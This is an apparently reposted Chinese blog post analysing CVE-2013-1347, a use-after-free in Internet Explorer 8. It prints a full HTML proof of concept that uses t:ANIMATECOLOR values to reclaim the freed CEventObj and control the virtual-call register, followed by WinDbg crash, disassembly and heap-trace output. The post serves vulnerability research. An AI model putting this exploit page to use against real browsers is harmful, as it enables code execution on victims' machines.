标签:
[CNNVD]Microsoft Internet Explorer 8 远程执行代码漏洞(CNNVD-201305-092)
Microsoft Internet Explorer是美国微软(Microsoft)公司发布的Windows操作系统中默认捆绑的Web浏览器。
Internet Explorer
访问尚未正确初始化或已被删除的对象的方式中存在一个远程执行代码漏洞,该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式损坏内存。攻
击者可能拥有一个特制的网站,旨在利用此漏洞通过IE浏览器,然后诱使用户查看该网站。
POC:
<!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
<?IMPORT namespace="t" implementation="#default#time2">
</meta>
<script>
function helloWorld()
{
animvalues = "";
// mshtml!CElement::Doc:
// 6586c815 8b01 mov eax,dword ptr [ecx]
// 6586c817 8b5070 mov edx,dword ptr [eax+70h]
// 6586c81a ffd2 call edx
for (i=0; i <= 0x70/4; i++) {
// t:ANIMATECOLOR 标签第一个对象用于覆盖虚表指针
// 由于索引虚函数时,需要偏移0x70,所以这里采用0x70/4去精确控制edx值
if (i == 0x70/4) {
//animvalues += unescape("%u5ed5%u77c1");
animvalues += unescape("%u4141%u4141"); // 控制edx=0x41414141
}
else {
animvalues += unescape("%u4242%u4242"); // 0x42424242
}
}
for(i = 0; i < 13; i++) {
// t:ANIMATECOLOR 标签值是一个用分号分隔的字符串,分号的个数决定对象的大小,
// 对象的每个元素都是一个指针,指向分号分隔出来的字符串
// 漏洞对象CGnericElement大小0x4c,所以这里需要包含0x4c/4=13个分号的字符串
animvalues += ";red";
}
f0 = document.createElement(‘span‘);
document.body.appendChild(f0);
f1 = document.createElement(‘span‘);
document.body.appendChild(f1);
f2 = document.createElement(‘span‘);
document.body.appendChild(f2);
document.body.contentEditable="true";
f2.appendChild(document.createElement(‘datalist‘));
f1.appendChild(document.createElement(‘span‘));
f1.appendChild(document.createElement(‘table‘));
try{
f0.offsetParent=null;
}catch(e) {}
f2.innerHTML="";
f0.appendChild(document.createElement(‘hr‘));
f1.innerHTML="";
CollectGarbage();
try {
//使用 t:ANIMATECOLOR 标签可以自由设置其内容,控制对象大小
a = document.getElementById(‘myanim‘);
a.values = animvalues;
}
catch(e) {}
}
</script>
</head>
<body onload="eval(helloWorld());">
<t:ANIMATECOLOR id="myanim"/>
</body>
</html>
打开POC后造成的crash如下,已开启页堆和堆分配记录。
(4dc.8f0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=66c25100 ebx=17a72fb0 ecx=09106fc8 edx=00000000 esi=045fedc8 edi=00000000 eip=668ac400 esp=045fed9c ebp=045fedb4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 mshtml!CElement::Doc: 668ac400 8b01 mov eax,dword ptr [ecx] ds:0023:09106fc8=????????
看一下附近的汇编,如下所示。是很明显的对象访问,看前三句就知道是去对象虚表,然后索引虚函数去调用。crash出现在ecx
1:017> u 668ac400 mshtml!CElement::Doc: 668ac400 8b01 mov eax,dword ptr [ecx] 668ac402 8b5070 mov edx,dword ptr [eax+70h] 668ac405 ffd2 call edx 668ac407 8b400c mov eax,dword ptr [eax+0Ch] 668ac40a c3 ret 668ac40b 33c0 xor eax,eax 668ac40d e9f7aeffff jmp mshtml!CAttrArray::PrivateFind+0x8f (668a7309) 668ac412 90 nop
我们看下ecx,如下所示,ecx是不可访的。那么我只需要关注一下ecx到底是什么就可以知道问题的关键了。
1:017> dc ecx 09106fc8 ???????? ???????? ???????? ???????? ???????????????? 09106fd8 ???????? ???????? ???????? ???????? ???????????????? 09106fe8 ???????? ???????? ???????? ???????? ???????????????? 09106ff8 ???????? ???????? ???????? ???????? ???????????????? 09107008 ???????? ???????? ???????? ???????? ???????????????? 09107018 ???????? ???????? ???????? ???????? ???????????????? 09107028 ???????? ???????? ???????? ???????? ???????????????? 09107038 ???????? ???????? ???????? ???????? ????????????????
看下ecx是否属于堆,如下所示,果然是属于堆的,而且根据堆的分配回溯这是已经释放的堆,明显的UAF漏洞。我们具体看下这是什么对象,CEventObj::`vector deleting destructor‘看来是CEventObj对象的问题
1:017> !heap -p -a ecx address 09106fc8 found in _DPH_HEAP_ROOT @ 51000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 7093c98: 9106000 2000 737e90b2 verifier!AVrfDebugPageHeapFree+0x000000c2 77955674 ntdll!RtlDebugFreeHeap+0x0000002f 77917aca ntdll!RtlpFreeHeap+0x0000005d 778e2d68 ntdll!RtlFreeHeap+0x00000142 76fff1ac kernel32!HeapFree+0x00000014 668b7dfc mshtml!CEventObj::`vector deleting destructor‘+0x00000022 668b7dd0 mshtml!CBase::SubRelease+0x00000022 668ab034 mshtml!PlainRelease+0x00000025 69e398ea mstime!CEventMgr::_FireEvent+0x000001c0 69dfd9db mstime!CTIMEElementBase::FireEvents+0x000000ce 69dfb7c9 mstime!CTIMEElementBase::FireEvent+0x0000016e 69e00521 mstime!MMBaseBvr::TEBvr::eventNotify+0x000000ac 69e49379 mstime!EventDispatcher::DoIt+0x0000001c 69e492bb mstime!Dispatch+0x00000083 69e493b7 mstime!CNodeBvrList::DispatchEventNotify+0x00000035 69e46f95 mstime!CEventData::CallEvent+0x00000021 69e442a6 mstime!CTIMENodeMgr::tick+0x000000ec 69e00b05 mstime!MMPlayer::Tick+0x0000004a 69e00b62 mstime!MMPlayer::OnTimer+0x00000036 69df720e mstime!CTIMEBodyElement::StartRootTime+0x000000a2 69df6ee4 mstime!CTIMEBodyElement::OnLoad+0x0000002f 69dfd528 mstime!CTIMEElementBase::onLoadEvent+0x0000001e 69e39e54 mstime!CEventMgr::Invoke+0x00000230 6690be60 mshtml!CBase::InvokeEvent+0x00000512 668ff3f1 mshtml!COmWindowProxy::FireEvent+0x00000169 66896a12 mshtml!COmWindowProxy::Fire_onload+0x000000d5 66896dde mshtml!CMarkup::OnLoadStatusDone+0x0000040a 66896aaf mshtml!CMarkup::OnLoadStatus+0x00000047 66896fad mshtml!CProgSink::DoUpdate+0x00000549 66824fab mshtml!CProgSink::OnMethodCall+0x00000012 668c94b2 mshtml!GlobalWndOnMethodCall+0x000000ff 668b37f7 mshtml!GlobalWndProc+0x0000010c
为了验证我们的猜测,我们来看下这个发生UAF的对象是怎么分配的。我们先对这个对象的析构函数下断,操作如下。
1:017> x mshtml!CEventObj::`vector deleting destructor‘ 668b7dda mshtml!CEventObj::`vector deleting destructor‘ = <no type information> 1:017> bu 668b7dda 1:017> bl 0 e 668b7dda 0001 (0001) 1:**** mshtml!CEventObj::`scalar deleting destructor‘
重新加载进程,别忘了设置.childdbg 1。每次运行都要重新设置感觉好烦,不知道怎么设置保存下来。
CVE-2013-1347Microsoft Internet Explorer 8 远程执行代码漏洞
标签:
原文地址:http://www.cnblogs.com/Ox9A82/p/5719187.html
